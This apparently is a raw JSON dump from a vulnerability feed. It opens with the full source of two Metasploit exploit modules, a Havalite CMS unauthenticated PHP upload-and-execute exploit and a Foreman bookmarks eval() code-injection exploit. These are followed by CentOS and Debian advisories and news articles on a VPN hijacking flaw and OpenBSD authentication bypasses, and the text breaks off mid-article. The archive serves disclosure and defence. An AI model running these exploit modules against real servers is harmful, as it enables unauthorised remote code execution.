"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-08T19:08:35", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 109}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "7b61e8490a14c0adedc25cc6604032a9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection", "description": "This module exploits a code injection vulnerability in the 'create' action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite (Foreman 1.2.0-RC1 and earlier).\n", "published": "2013-07-16T15:07:31", "modified": "2017-07-24T13:26:21", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2121", "https://bugzilla.redhat.com/show_bug.cgi?id=968166", "http://projects.theforeman.org/issues/2631"], "cvelist": ["CVE-2013-2121"], "lastseen": "2019-11-10T21:18:10", "history": [], "viewCount": 10, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2019-11-10T21:18:10"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-2121"]}, {"type": "zdt", "idList": ["1337DAY-ID-21021"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122510"]}, {"type": "exploitdb", "idList": ["EDB-ID:27045"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/FOREMAN_OPENSTACK_SATELLITE_CODE_EXEC"]}, {"type": "redhat", "idList": ["RHSA-2013:0995"]}], "modified": "2019-11-10T21:18:10"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize\n super(\n 'Name' => 'Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection',\n 'Description' => %q{\n This module exploits a code injection vulnerability in the 'create'\n action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite\n (Foreman 1.2.0-RC1 and earlier).\n },\n 'Author' => 'Ramon de C Valle',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2013-2121'],\n ['CWE', '95'],\n ['OSVDB', '94671'],\n ['BID', '60833'],\n ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=968166'],\n ['URL', 'http://projects.theforeman.org/issues/2631']\n ],\n 'Platform' => 'ruby',\n 'Arch' => ARCH_RUBY,\n 'Privileged' => false,\n 'Targets' =>\n [\n ['Automatic', {}]\n ],\n 'DisclosureDate' => 'Jun 6 2013',\n 'DefaultOptions' => { 'PrependFork' => true },\n 'DefaultTarget' => 0\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptBool.new('SSL', [true, 'Use SSL', true]),\n OptString.new('USERNAME', [true, 'Your username', 'admin']),\n OptString.new('PASSWORD', [true, 'Your password', 'changeme']),\n OptString.new('TARGETURI', [ true, 'The path to the application', '/']),\n ], self.class\n )\n end\n\n def exploit\n print_status(\"Logging into #{target_url}...\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'users', 'login'),\n 'vars_post' => {\n 'login[login]' => datastore['USERNAME'],\n 'login[password]' => datastore['PASSWORD']\n }\n )\n\n fail_with(Failure::Unknown, 'No response from remote host') if res.nil?\n\n if res.headers['Location'] =~ /users\\/login$/\n fail_with(Failure::NoAccess, 'Authentication failed')\n else\n session = $1 if res.get_cookies =~ /_session_id=([0-9a-f]*)/\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve the current session id') if session.nil?\n end\n\n print_status('Retrieving the CSRF token for this session...')\n res = send_request_cgi(\n 'cookie' => \"_session_id=#{session}\",\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri)\n )\n\n fail_with(Failure::Unknown, 'No response from remote host') if res.nil?\n\n if res.headers['Location'] =~ /users\\/login$/\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve the CSRF token')\n else\n csrf_param = $1 if res.body =~ /<meta[ ]+content=\"(.*)\"[ ]+name=\"csrf-param\"[ ]*\\/?>/i\n csrf_token = $1 if res.body =~ /<meta[ ]+content=\"(.*)\"[ ]+name=\"csrf-token\"[ ]*\\/?>/i\n\n if csrf_param.nil? || csrf_token.nil?\n csrf_param = $1 if res.body =~ /<meta[ ]+name=\"csrf-param\"[ ]+content=\"(.*)\"[ ]*\\/?>/i\n csrf_token = $1 if res.body =~ /<meta[ ]+name=\"csrf-token\"[ ]+content=\"(.*)\"[ ]*\\/?>/i\n end\n\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve the CSRF token') if csrf_param.nil? || csrf_token.nil?\n end\n\n payload_param = Rex::Text.rand_text_alpha_lower(rand(9) + 3)\n\n print_status(\"Sending create-bookmark request to #{target_url('bookmarks')}...\")\n res = send_request_cgi(\n 'cookie' => \"_session_id=#{session}\",\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'bookmarks'),\n 'vars_post' => {\n csrf_param => csrf_token,\n payload_param => payload.encoded,\n 'bookmark[controller]' => \"eval(params[:#{payload_param}])#\",\n 'bookmark[name]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3),\n 'bookmark[query]' => Rex::Text.rand_text_alpha_lower(rand(9) + 3)\n }\n )\n end\n\n def target_url(*args)\n (ssl ? 'https' : 'http') +\n if rport.to_i == 80 || rport.to_i == 443\n \"://#{vhost}\"\n else\n \"://#{vhost}:#{rport}\"\n end + normalize_uri(target_uri.path, *args)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-10T21:18:10", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 110}], "viewCount": 11, "enchantments": {"score": {"value": 1.1, "vector": "NONE", "modified": "2019-11-10T23:28:06"}, "dependencies": {"references": [{"type": "debian", "idList": ["DEBIAN:DLA-1986-1:E0EB6", "DEBIAN:DLA-1987-1:E3D38", "DEBIAN:DLA-1984-1:5FA59", "DEBIAN:DLA-1985-1:4C9DB", "DEBIAN:DSA-4561-1:56D39"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2477-1", "OPENSUSE-SU-2019:2472-1", "OPENSUSE-SU-2019:2474-1", "OPENSUSE-SU-2019:2466-1", "OPENSUSE-SU-2019:2453-1", "OPENSUSE-SU-2019:2454-1", "OPENSUSE-SU-2019:2464-1", "OPENSUSE-SU-2019:2452-1", "OPENSUSE-SU-2019:2459-1", "OPENSUSE-SU-2019:2451-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:97F975C073505AE88655FF1C539740A6"]}, {"type": "nessus", "idList": ["EULEROS_SA-2019-2216.NASL", "GENTOO_GLSA-201911-02.NASL"]}], "modified": "2019-11-10T23:28:06"}, "vulnersScore": 1.1}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"]}
{"centos": [{"lastseen": "2019-12-07T03:31:19", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2019:4024\n\n\nSimple DirectMedia Layer (SDL) is a cross-platform multimedia library designed to provide fast access to the graphics frame buffer and audio device.\n\nSecurity Fix(es):\n\n* SDL: CVE-2019-13616 not fixed in Red Hat Enterprise Linux 7 erratum RHSA-2019:3950 (CVE-2019-14906)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2019-December/023538.html\n\n**Affected packages:**\nSDL\nSDL-devel\nSDL-static\n\n**Upstream details at:**\n", "modified": "2019-12-06T23:34:45", "published": "2019-12-06T23:34:45", "id": "CESA-2019:4024", "href": "http://lists.centos.org/pipermail/centos-announce/2019-December/023538.html", "title": "SDL security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-12-07T10:16:37", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4579-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nDecember 06, 2019 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : nss\nCVE ID : CVE-2019-11745 CVE-2019-17007\n\nTwo vulnerabilities were discovered in NSS, a set of cryptographic\nlibraries, which may result in denial of service and potentially the\nexecution of arbitrary code.\n \nFor the stable distribution (buster), these problems have been fixed in\nversion 2:3.42.1-1+deb10u2.\n\nWe recommend that you upgrade your nss packages.\n\nFor the detailed security status of nss please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/nss\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2019-12-06T21:54:40", "published": "2019-12-06T21:54:40", "id": "DEBIAN:DSA-4579-1:BA112", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2019/msg00232.html", "title": "[SECURITY] [DSA 4579-1] nss security update", "type": "debian", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-06T22:18:25", "bulletinFamily": "unix", "description": "Package : librabbitmq\nVersion : 0.5.2-2+deb8u1\nCVE ID : CVE-2019-18609\nDebian Bug : #946005\n\nIt was discovered that there was an integer overflow vulnerability in\nlibrabbitmq, a library for robust messaging between applications and\nservers.\n\nFor Debian 8 "Jessie", this issue has been fixed in librabbitmq version\n0.5.2-2+deb8u1.\n\nWe recommend that you upgrade your librabbitmq packages.\n\n\nRegards,\n\n- -- \n ,''`.\n : :' : Chris Lamb\n `. `'` lamby@debian.org / chris-lamb.co.uk\n `-\n\n", "modified": "2019-12-06T15:05:37", "published": "2019-12-06T15:05:37", "id": "DEBIAN:DLA-2022-1:9334B", "href": "https://lists.debian.org/debian-lts-announce/2019/debian-lts-announce-201912/msg00004.html", "title": "[SECURITY] [DLA 2022-1] librabbitmq security update", "type": "debian", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-05T22:18:27", "bulletinFamily": "unix", "description": "Package : libav\nVersion : 6:11.12-1~deb8u9\nCVE ID : CVE-2017-17127 CVE-2017-18245 CVE-2018-19128 CVE-2018-19130 \n CVE-2019-14443 CVE-2019-17542\n\n\nSeveral security issues were fixed in libav, a multimedia library for\nprocessing audio and video files.\n\nCVE-2017-17127\n\n The vc1_decode_frame function in libavcodec/vc1dec.c allows remote\n attackers to cause a denial of service (NULL pointer dereference\n and application crash) via a crafted file.\n CVE-2018-19130 is a duplicate of this vulnerability.\n\nCVE-2017-18245\n\n The mpc8_probe function in libavformat/mpc8.c allows remote\n attackers to cause a denial of service (heap-based buffer\n over-read) via a crafted audio file on 32-bit systems.\n\nCVE-2018-19128\n\n Heap-based buffer over-read in decode_frame in libavcodec/lcldec.c\n allows an attacker to cause denial-of-service via a crafted avi\n file.\n\nCVE-2019-14443\n\n Division by zero in range_decode_culshift in libavcodec/apedec.c\n allows remote attackers to cause a denial of service (application\n crash), as demonstrated by avconv.\n\nCVE-2019-17542\n\n Heap-based buffer overflow in vqa_decode_chunk because of an\n out-of-array access in vqa_decode_init in libavcodec/vqavideo.c.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n6:11.12-1~deb8u9.\n\nWe recommend that you upgrade your libav packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "modified": "2019-12-05T18:49:12", "published": "2019-12-05T18:49:12", "id": "DEBIAN:DLA-2021-1:97C0E", "href": "https://lists.debian.org/debian-lts-announce/2019/debian-lts-announce-201912/msg00003.html", "title": "[SECURITY] [DLA 2021-1] libav security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2019-12-06T17:02:13", "bulletinFamily": "info", "description": "A vulnerability in most Linux distros has been uncovered that allows a network-adjacent attacker to hijack VPN connections and inject rogue data into the secure tunnels that victims are using to communicate with remote servers.\n\nAccording to researchers at University of New Mexico and Breakpointing Bad, the bug (CVE-2019-14899), \u201callows\u2026an attacker to determine if\u2026a user is connected to a VPN, the virtual IP address they have been assigned by the VPN server, and whether or not there is an active connection to a given website.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn [an advisory](<https://seclists.org/oss-sec/2019/q4/122>) released this week, they noted that once a proof-of-concept exploit allowed them to determine a VPN client\u2019s virtual IP address and make inferences about active connections, they were then able to use encrypted replies to unsolicited packets to determine the sequence and acknowledgment numbers of connections. These allowed them to hijack TCP sessions and inject data into the TCP stream.\n\n## Anatomy of an Attack\n\nAn attack would require convincing a user to connect to a rogue wireless access point (or other internet connection) under the adversary\u2019s control (imagine a coffee shop scenario, for instance). The attacker can then start scanning devices connected to the access point for active VPN sessions.\n\nTo do this, the access point can send SYN-ACK packets to any connected devices, canvassing across the entire virtual IP space. When a SYN-ACK is sent to the correct virtual IP on the victim device, the device responds; when the SYN-ACK is sent to the incorrect virtual IP, nothing is received by the attacker. An automated script would presumably make this process painless for the adversary.\n\nOnce the attacker determines that the user has an active TCP connection to an external server, the next step is to sniff out the next sequence number and in-window acknowledgment number needed to inject forged packets into the connection.\n\nTo find the appropriate sequence and ACK numbers, the attacker can continually spoof reset packets into the active connection until it sniffs challenge ACKs.\n\n\u201cThe victim\u2019s device will trigger a TCP challenge ACK on each reset it receives that has an in-window sequence number for an existing connection,\u201d according to the advisory. \u201cFor example, if the client is using OpenVPN to exchange encrypted packets with the VPN server, then the client will always respond with an SSL packet of length 79 when a challenge ACK is triggered.\u201d\n\nContinuing with packet-spoofing and challenge ACK analysis (detailed in the advisory), an attacker can infer the rest of the information needed to inject arbitrary payloads into the victim\u2019s active VPN session.\n\n## Affected OS and VPNs\n\nThe bug affects macOS, iOS and Android, most Linux distributions including Ubuntu, Fedora and Debian, as well as Unix-like OS such as FreeBSD and OpenBSD. At particular risk are those Linux distros that use a version of systemd pulled after November 28 of last year, which turned reverse path filtering off, researchers warned. The IPv4 version of CentOS has been confirmed as unaffected.\n\nAs for VPN technology, researchers found that a proof-of-concept exploit works against OpenVPN, WireGuard and IKEv2/IPSec, and they\u2019re in the process of testing Tor.\n\n\u201cThe VPN technology used does not seem to matter and we are able to make all of our inferences even though the responses from the victim are encrypted, using the size of the packets and number of packets sent (in the case of challenge ACKs, for example) to determine what kind of packets are being sent through the encrypted VPN tunnel,\u201d according to the advisory.\n\nThe bug has been reported to distros and the Linux kernel security team, as well as to others impacted such as Systemd, Google, Apple, OpenVPN, and WireGuard.\n\n\u201cAdding a prerouting rule to drop packets destined for the client\u2019s virtual IP address is an effective [mitigation] on some systems,\u201d according to the advisory. \u201cThere are other potential solutions being considered by the kernel maintainers, but I can\u2019t speak to their current status.\u201d\n\n[**Free Threatpost Webinar:**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>) **_Risk around third-party vendors is real and can lead to data disasters. We rely on third-party vendors, but that doesn\u2019t mean forfeiting security. _**[**_Join us on Dec. 18th at 2 pm EST_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_ as Threatpost looks at managing third-party relationship risks with industry experts Dr. Larry Ponemon, of Ponemon Institute; Harlan Carvey, with Digital Guardian and Flashpoint\u2019s Lance James. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_._**\n", "modified": "2019-12-06T16:54:02", "published": "2019-12-06T16:54:02", "id": "THREATPOST:C90531BC1E0B38F400111112E4CBEF3A", "href": "https://threatpost.com/linux-bug-vpns-hijacking/150891/", "type": "threatpost", "title": "Linux Bug Opens Most VPNs to Hijacking", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-05T16:11:58", "bulletinFamily": "info", "description": "An authentication bypass and three local privilege-escalation (LPE) bugs have been uncovered in OpenBSD, the Unix-like open-source operating system known for its security protections.\n\nThe most severe of the vulnerabilities is the bypass (CVE-2019-19521), which is remotely exploitable.\n\nOpenBSD uses BSD authentication, which enables the use of passwords, S/Key challenge-and-response authentication and Yubico YubiKey tokens. In each of these cases, to perform the authentication, the string \u201c/usr/libexec/auth/login_style [-v name=value] [-s service] username class\u201d is used. If an attacker specifies the username \u201c-schallenge\u201d (or \u201c-schallenge:passwd,\u201d the authentication is automatically successful and therefore bypassed.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThat said, \u201cIts real-world impact should be studied on a case-by-case basis,\u201d said Qualys, the research firm that found the bugs, in [an advisory](<https://www.qualys.com/2019/12/04/cve-2019-19521/authentication-vulnerabilities-openbsd.txt?_ga=2.75852181.122675264.1575541632-949691503.1575541632>) issued this week. \u201cFor example, sshd is not exploitable thanks to its defense-in-depth mechanisms.\u201d\n\nThe other bugs include CVE-2019-19520, which allows LPE via xlock, which refuses all new server connections until a user enters a password at the keyboard; CVE-2019-19522, which allows LPE via the aforementioned authentication mechanisms S/Key and YubiKey; and CVE-2019-19519, which allows LPE via su.\n\nThe first bug exists because, \u201c/usr/X11R6/bin/xlock is installed by default and is set-group-ID \u2018auth,\u2019 not set-user-ID, which leaves an incomplete check,\u201d Qualys explained. \u201cA local attacker can exploit this vulnerability and dlopen() their own driver to obtain the privileges of the group \u2018auth.'\u201d\n\nArmed with the privileges of the group \u201cauth\u201d, a local attacker can then use the second LPE bug to obtain full root privileges, if the S/Key or YubiKey authentication type is enabled.\n\n\u201c[That\u2019s because login_skey and login_yubikey do not verify that the files in /etc/skey and /var/db/yubikey belong to the correct user, and these directories are both writable by the group \u2018auth,'\u201d Qualys said.\n\nTo exploit the issue, a local attacker with \u201cauth\u201d privileges can add an S/Key entry (a file in /etc/skey) or a YubiKey entry (two files in /var/db/yubikey) for the user \u201croot.\u201d\n\nThe last bug allows a local attacker to exploit a problem in su. \u201cSu\u201d stands for \u201csubstitute user,\u201d and is used by a computer user to execute commands with the privileges of another user account. When executed it invokes a shell without changing the current working directory or the user environment.\n\nIn this case, a flaw in su\u2019s -L option (\u201cLoop until a correct username and password combination is entered\u201d) allows an attacker to log in as themselves but with another user\u2019s login class.\n\n[OpenBSD](<https://threatpost.com/experts-openbsd-backdoor-allegations-almost-certainly-false-121510/74782/>) patches are available, and users should [apply them](<https://www.openbsd.org/faq/faq10.html>) to protect against attacks.\n\n[**Free Threatpost Webinar:**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>) **_Risk around third-party vendors is real and can lead to data disasters. We rely on third-party vendors, but that doesn\u2019t mean forfeiting security. _**[**_Join us on Dec. 18th at 2 pm EST_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_ as Threatpost looks at managing third-party relationship risks with industry experts Dr. Larry Ponemon, of Ponemon Institute; Harlan Carvey, with Digital Guardian and Flashpoint\u2019s Lance James. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_._**\n", "modified": "2019-12-05T16:06:51", "published": "2019-12-05T16:06:51", "id": "THREATPOST:4524DC4DCBB97B9FDC5E13DA68B9DD1A", "href": "https://threatpost.com/openbsd-authentication-lpe-bugs/150849/", "type": "threatpost", "title": "OpenBSD Hit with Authentication, LPE Bugs", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2019-12-06T12:33:52", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-WMkBOTVhvWY/Xeo0rDTtwyI/AAAAAAAA17s/FVhvLMEY1qs7YWBRRvq_YhwWs1uqQpxjwCLcBGAsYHQ/s728-e100/linux-vpn-hacking.jpg>)\n\nA team of cybersecurity researchers has disclosed a new severe vulnerability affecting most Linux and Unix-like operating systems, including FreeBSD, OpenBSD, macOS, iOS, and Android, that could allow remote 'network adjacent attackers' to spy on and tamper with encrypted VPN connections. \n \nThe vulnerability, tracked as CVE-2019-14899, resides in the networking stack of various operating systems and can be exploited against both IPv4 and IPv6 TCP streams. \n \nSince the vulnerability does not rely on the VPN technology used, the attack works against widely implemented virtual private network protocols like OpenVPN, WireGuard, IKEv2/IPSec, and more, the researchers confirmed. \n\n\n \nThis vulnerability can be exploited by a network attacker \u2014 controlling an access point or connected to the victim's network \u2014 just by sending unsolicited network packets to a targeted device and observing replies, even if they are encrypted. \n \nAs explained by the researchers, though there are variations for each of the impacted operating systems, the vulnerability allows attackers to: \n \n\n\n * determine the virtual IP address of a victim assigned by the VPN server,\n * determine if there is an active connection to a given website,\n * determine the exact seq and ack numbers by counting encrypted packets and/or examining their size, and\n * inject data into the TCP stream and hijack connections.\n \n\n\n> \"The access point can then determine the virtual IP of the victim by sending SYN-ACK packets to the victim device across the entire virtual IP space,\" the team said in its [advisory](<https://seclists.org/oss-sec/2019/q4/122>).\n\n \n\n\n> \"When a SYN-ACK is sent to the correct virtual IP on the victim device, the device responds with a RST; when the SYN-ACK is sent to the incorrect virtual IP, nothing is received by the attacker.\"\n\n \nWhile explaining variations in the behavior of different operating systems, as an example, researchers said the attack does not work against macOS/iOS devices as described. \n \nInstead, an attacker needs to \"use an open port on the Apple machine to determine the virtual IP address.\" In their testing, the researchers use \"port 5223, which is used for iCloud, iMessage, FaceTime, Game Center, Photo Stream, and push notifications, etc.\" \n\n\n[](<https://bit.ly/2nAQ7y5> \"Web Application Firewall\" )\n\n \nThe researchers tested and successfully exploited the vulnerability against the following operating systems and the init systems, but they believe this list could go long as researchers test the flaw on more systems. \n \n\n\n * Ubuntu 19.10 (systemd)\n * Fedora (systemd)\n * Debian 10.2 (systemd)\n * Arch 2019.05 (systemd)\n * Manjaro 18.1.1 (systemd)\n * Devuan (sysV init)\n * MX Linux 19 (Mepis+antiX)\n * Void Linux (runit)\n * Slackware 14.2 (rc.d) \n * Deepin (rc.d)\n * FreeBSD (rc.d) \n * OpenBSD (rc.d)\n \n\"Most of the Linux distributions we tested were vulnerable, especially Linux distributions that use a version of systemd pulled after November 28th of last year, which turned reverse path filtering off,\" the researchers said. \n \n\"However, we recently discovered that the attack also works against IPv6, so turning reverse path filtering on isn't a reasonable solution.\" \n \nAs possible mitigation, researchers suggested to turn on reverse path filtering, implement bogon filtering, and encrypt packet size and timing to prevent attackers from making any inference. \n \nWhile the researchers have not yet revealed technical details of the vulnerability, they are planning to publish an in-depth analysis of this flaw and its 